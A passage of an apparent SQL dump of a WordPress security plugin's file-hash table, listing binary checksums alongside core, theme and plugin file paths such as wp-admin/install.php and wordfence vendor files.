�','����?�ͺ�mV�yi�z2 �BC� m�jX��','',0,'?'),('�8ʋoI�2�E;�(','wp-content/themes/advance/inc/kirki/includes/class-kirki-init.php',0,'Ք��\0�U��8��w','Ք��\0�U��8��w','�F\0A�5 I[�z��b̧�{���p�]�s�','',0,'?'),('�B�H*mz��N83��','wp-admin/css/edit-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3au\r�\rt��3 �','��+y�6f��#E8+ڨC��D����n��','',0,'?'),('�V}�P���m�/�|I*�','wp-includes/js/customize-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�W��W�:�H��t�','wp-content/themes/doctors/core/includes/additional-script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9W�����t�@t��',';�k�g^��*�1�*�<D��@u�p3��^','',0,'?'),('�l��t:{0+7�9C�','wp-includes/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('��.��v8-rJŕ�qQ','wp-includes/js/wp-auth-check.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j{�,��ݍ�][c','�R)C�`p�� ъ ���;(�Ltcn�zƈ��','',0,'?'),('��6��U�Ѧ�u�','wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�S:&\0��>f�\\�','�l�/r+���j�EQ�n��ھ�y�~Q�','',0,'?'),('��7��E#�wŧj���','wp-admin/includes/image-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LY���b �z.c�','\\�ǫ�0.��^IR�����UQ��2e@��]','',0,'?'),('����bq�/���F�k','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7��¤\r�F��g','�n�V\'�V����V�)F|*ᑝ2�N��z','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('�U�DM)�\Z���','wp-content/themes/healthcare/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]q��z��F�A�!','_}�!ƭQ~�M�%$�m� ��<S.m����t','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� !�y,6��Yh���','0��Ú�1B$��Н�_@��#Xw� �p5�P','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�i6��xu0\\����','�s�\"9���l���+���/���[�','',0,'?'),('�PJCg���!�lZ�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','it��{bAR���}�','L�7r��_���ܗ�7��6m\"�BG̐����','',0,'?'),('�P�)-�J��@��=!.','wp-content/themes/wp-barrister/library/images/trans-w.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Б4�4�qVC4���','tyseU����+�_,�L�r0����X,C�d�','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':-��q���?b�^�','f2\"�c`��}�`��·����֑��ѕl�o','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('��w�h��M�M0��^�','wp-content/plugins/redirection/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��6�O �$+d���5','��%���Mpѐ��ݶߺ�@���b�A(�','',0,'?'),('����V�h��G�!�j\'','wp-content/plugins/wp-cerber/assets/flags/jm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b��F/�+�d9','\n�Ƽ�H�_���T�T�2�[�_��ox�u�','',0,'?'),('����\ZM۞�U��K�','wp-content/themes/doctors/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͈vb#E�<��1)�','w\0����2�f�\'�SC[��>@j��_d�ƒ5','',0,'?'),('����L��6 ��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��N�0�V��}����','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/upsell.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gvc�+��\Zwm��aٛA','e�-f^Y�怳,��\\�oG��B��)�z,�`A','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�֒��y�DБ�#�','L��)Ӊ�\"�.4l��N�U�7�+#��R}���','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v����j&�Ƶ','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u �$Q3��E�r�|Jm�','',0,'?'),('���#�V(k]$����(','wp-content/themes/twentynineteen/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�\"MY���~��','�lG����w��}V���>��%{n��\\�z��;�','',0,'?'),('���I 2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;� m8','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('����������','wp-content/themes/advance/inc/kirki/includes/class-kirki-control.php',0,'/�˥��q�\r\'l*���','/�˥��q�\r\'l*���','�E�(�\ru��\nP18dy��h�R�����k�q','',0,'?'),('�S�b�eL��','wp-content/plugins/wp-cerber/assets/flags/be.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZx��ʭ��T�/� �','4�nMM��e)��<�Ia�P�1�K�~#`G','',0,'?'),('�\\p�+���a=a1:P�#','wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�-I��:�����9�+','Y��z���W2|{}1и����^�iN�q�C�Y�','',0,'?'),('��ZԬ=!Ri=�7�h�','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j \r�<l�J�l�','[�a6$sp8����Y�Q�\'��1��\0�Dح','',0,'?'),('��{��K�45ugX�1l','wp-content/themes/weblog/assets/library/owl-carousel/grabbing.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ۥ�]���{','Y2���c]ԅb��b����r׆jcz�xX','',0,'?'),('���t˩��,���B�','wp-content/themes/wp-barrister/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�Ջ�����):�','v�B��yC\0^<�1�}S65�����a�S�E�','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('��f0��ͭ��~�)','wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�_rY+ʂ;�','��yU�]f��8���t�����l�L.','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�k���K\\Vl�','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��r�L-k\'�XjJ��z','wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��7�>ij�(6��','đ�_�Y�UAD���W��y_I�>���%�','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('�|�aV��~�[f��.','wp-content/themes/twentynineteen/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�{.�b:N���,n�','�J�q[9w��!\0�|b���n�Q���\'i�M��','',0,'?'),('�!ۅ.�4��qdtP��','wp-content/plugins/akismet/views/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{ETJ�_q���n���','·^\n�b��q<v`x��K���Z�W��>�Gw��','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 5D�_�\'-�w','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�&8�]= ����R','h�Q�4n��ńY�9���-ǚ7F�&8���ܷ','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uP��*�L�[�C�','!��JL=�Tl̞_p@��ȟ���R��M��S[','',0,'?'),('�W��f�0�\n�D �/\'','wp-content/plugins/wp-cerber/assets/flags/km.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%������&\'z���V',';��NS6����:����݇�u͙�r�x� ','',0,'?'),('�z9� �`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('���*r%Y�3/�hN�p','wp-content/plugins/wp-cerber/assets/flags/sb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�5J��䈒?Qo�<','����T� k��w#�����Af�3A2�͂M','',0,'?'),('��\Z5o��#R\'/��l','wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\Z>w���@�R-/Y�','B\nZ\Z��_p�n͂��Q?/�\r3s�}���)','',0,'?'),('���1Uj�Ks��?','wp-content/themes/doctors/core/home/blocks/text/skin1/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o*0N��i&\0T�\Z��S','/#��@���U��F\Z�Ϟ�ƀ&L���N�&','',0,'?'),('��w�#�Q������','wp-content/plugins/akismet/views/predefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#>ajϬa�����4�','�w�s��bN}�qY��7zo�U��u�\'���1','',0,'?'),('���{�RDC�~�����','wp-content/plugins/redirection/redirection.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Y|��c������','���o�;�Q�#�*�S��{Í�\09�6�ǽ','',0,'?'),('���Ǐ��f\0�5���','wp-content/themes/wp-barrister/library/images/icon-pi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�{9��8��Y8�w','��vg,��l�<��&F�^�a�>l\'�\Zİ;��ƾ','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J虝���\n�G{5�','�7�ϝ���P9n)%�-�i�Qԭv���kJ���','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,k�)����X','��>��|F��j�e�<;E�Tr�ۭe��wO','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('��<�un8G!>d=��','wp-content/themes/healing-touch/images/hr_double.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`e�7���=��q�i','$��Ѝ��o���}�?�3\Z�+_�)��d�','',0,'?'),('����S^M�>�\0L\n��','wp-content/themes/skt-toothy/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�ܪ�m\r�����','��͗�k��W��%����B�TpW�V�8���','',0,'?'),('� v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^� =跨|��','',0,'?'),('�*\0�U\'-,�M�','wp-content/themes/twentynineteen/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=#kQ\n�z��C','�uC���#ďAUf{Kb�|�\ZIl�L���٩','',0,'?'),('�5�!��b�z\rY�#W','wp-content/themes/wp-barrister/content-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q[ճ��\'*q�_n�','s�˿�%���\0M��tBrM�._��-����','',0,'?'),('�F��J��:�Oq�T','wp-content/themes/advance/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js',0,'�lz���`��\r9��','�lz���`��\r9��','i>�-���JU:k�?����eB�\r�x�g�','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gq���i�s�픋-','�~:\"�`�he&@��*����A�����','',0,'?'),('�]�ە�Ux� ���','wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�\Z�H���v���9�>q','Y���P�-�m<äR�vW��W\"h�:�(o&k/','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('�p �Z��ۑ�p�]','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-control.php',0,'����XP\0c��O�O�','����XP\0c��O�O�','n��J\Z,8��Y8{\0R��f��m�~���QɹZ','',0,'?'),('��6��:�$4�-Tg5','wp-content/themes/twentynineteen/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�� ���L`B[','���V\"��\ZkY�cnUkYY$-,��y�\r�','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gJ��^<','���\ZybF���v��J�}�z��Lj�� (','',0,'?'),('��+`ӥn����l','wp-content/themes/advance/header.php',0,'� �M|��d��|r�\\�','� �M|��d��|r�\\�','�K�[U�<�\"��%k��d�IA;X�0ecU��f','',0,'?'),('�����Q�t����2\r','wp-content/themes/doctors/core/contents/part_subHeader/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�D����� �<0$','�Zc}��n��?T��3��iy��0�','',0,'?'),('��gee#�@OnH�q','wp-content/themes/doctors/core/contents/loop_post/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','б�]<?D����0�','��(��W?�%���ڊ��L��u�J��w','',0,'?'),('��Q+W�r�JQ̸B','wp-content/themes/vision-lite/customize-pro/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�$�8%L�����','\0[�Q�3���BæQ��o�B9�]5]�D�O�\'=','',0,'?'),('�ۥ�\riL*ǘ(�.','wp-content/themes/regina-lite/layout/js/plugins/owl-carousel/owl-carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A��r�K��%�?','�(��-ϳ.3TA�*s$�\"�C_��O��^�)�','',0,'?'),('��hxh�M*����S�','wp-content/plugins/wp-cerber/assets/flags/bn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C.M��sg:��','s�@�Zd}���x���-r���^�x8Z.���','',0,'?'),('���\0S���ɘ���`','wp-content/themes/wp-barrister/library/images/icon-email-sm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H:\'!���X�0��','n9x��\r�\Z����:5d�d��CEc;�;��b','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��]&?��I*1�e','�s������Wk�B��$oG��N��\n���','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y�+�=#��}9�K�','X����ק�YWo�L�v�؊�n�A C�','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('���\0�K��|\\A���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/section-repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/)s����),�U�','������0���8�J�;/{��\\uE��','',0,'?'),('������H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0�q2�l����d','ȩ~��0M���0\"���7 ]1�sP�J�T','',0,'?'),('�-�(ҟ�oF�L���','wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ5�/�ҲP��C','�[T����4Gzݹo�ɓHL4�` �(��;�Gc','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N`�^/��(��ǝ2�=','/{��Oe;gt@aݸG �/1Sv>��e̢kE','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�h�w^�(�n���','wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5+I6N,^�~��','x�u]!�%�\Z�|8c�˹��?�<M+GG������','',0,'?'),('�pt_ Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uְ�Z�l�\"�','�����K��ṥ�=���$�ϻ���]�C�i','',0,'?'),('�������X�\0T�O��','wp-content/themes/twentynineteen/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�,��� p�A��','\0�4����^\ZY��i�_�O��_�#','',0,'?'),('���\'(jli�����','wp-content/themes/twentytwenty/template-parts/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R0�5����wT��','�+�\\@o�g���\n�@��������','',0,'?'),('��.��9��q��+�oA','wp-content/plugins/redirection/locale/json/redirection-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ِ97�m3�.�&�uS','�_@^�|��pHݣ��e��!1`<\Z�I�0�','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��V80*�','\0-��ZGhV¥�\'�U\\ �����%d�','',0,'?'),('��-X؋ 뛰y�W�S�','wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php',0,'���q:^|�͖�8��','���q:^|�͖�8��','?I�F�1��pN��+��Y5��\'-�A~�1��^','',0,'?'),('��˳�}��N�3+Mg','wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:-��Eՠx�$�B',',�4�~aT�lS �fQO f���Tӵ��;��)','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kt���q �x','��7`YՓ<���9Y�i�l�۪�Kȯ��','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��{�\0S�g��D���','��ы��I<�m�db�}��̑x��V�5/����','',0,'?'),('���7�%�̬���&�','wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��XBI���mC�','Q�E��e��\r��_�1�Pj���W�r�','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('�~��DZ�w���%i','wp-content/themes/regina-lite/inc/customizer/assets/js/jquery.scrollTo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��c� �@�y','p��0���O�� ����9��@5�E~���U�','',0,'?'),('�.���FC�p���3��','wp-content/plugins/wordfence/js/wfdropdown.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�kLǤe���(�ȸK','wp-content/plugins/wp-cerber/assets/flags/ch.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�k�g�iT���I�ކ','R���:�=b���U|O@��R�˂}��-','',0,'?'),('��F������0� m��','wp-content/themes/healthcare/css/font-awesome/less/animated.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Sʼ�Y�T��','��5-^��}>͌2\n\0){\n��rѼ���','',0,'?'),('���H�_R��r��\0�','wp-content/themes/healthcare/bootstrap/css/bootstrap-theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!���*\0��RyE','�$�øWy�F�Eqa��pJ�n!q�\n�EtE$/','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�JY��Fq�^��N�','z��w�iL�_�*� !$c��L*�T�qDN_','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�m� i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('��H��_X�Ѕ�gU','wp-content/themes/twentytwentyone/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL6-!讜k���y�t','��\0�<w����3=S��wT-|\"��uV�c � w','',0,'?'),('����Ѥ;D���','wp-content/plugins/wp-cerber/assets/flags/jp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Jn@��Aל^�','��7���^qU���` �� �}wͧ�h��','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('��\Zn����W��Jw��','wp-content/themes/regina-lite/layout/js/plugins/html5shiv/html5.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʅ��ڀ&��x֖S\0�','hj^G�L7G`�!adt:+\Z<1����ޛ&�','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('��ة^k�\"��','wp-content/themes/weblog/acmethemes/customizer/options/options-reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�K\nܯ���f�j%','w^�D �e����D|�Q�L�c\r9F)x�.[','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�(��\"����?4U','wp-content/themes/twentytwenty/assets/css/editor-style-classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Vn-�C^�j�','CQA�FFC�z�R[ZM`�Gbf�2�A�pЋ���','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�;�Q�^�����>z��p','wp-content/themes/vision-lite/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�/0�M��','m��*m*V�f�����q�TqU�!��','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%� ��#���#�5','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('�sAh$�)�7 ��9��','wp-content/themes/regina-lite/layout/css/owl-transitions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�ٟ�h,��','W�i1(���p�A!F\nYE�ME�Y 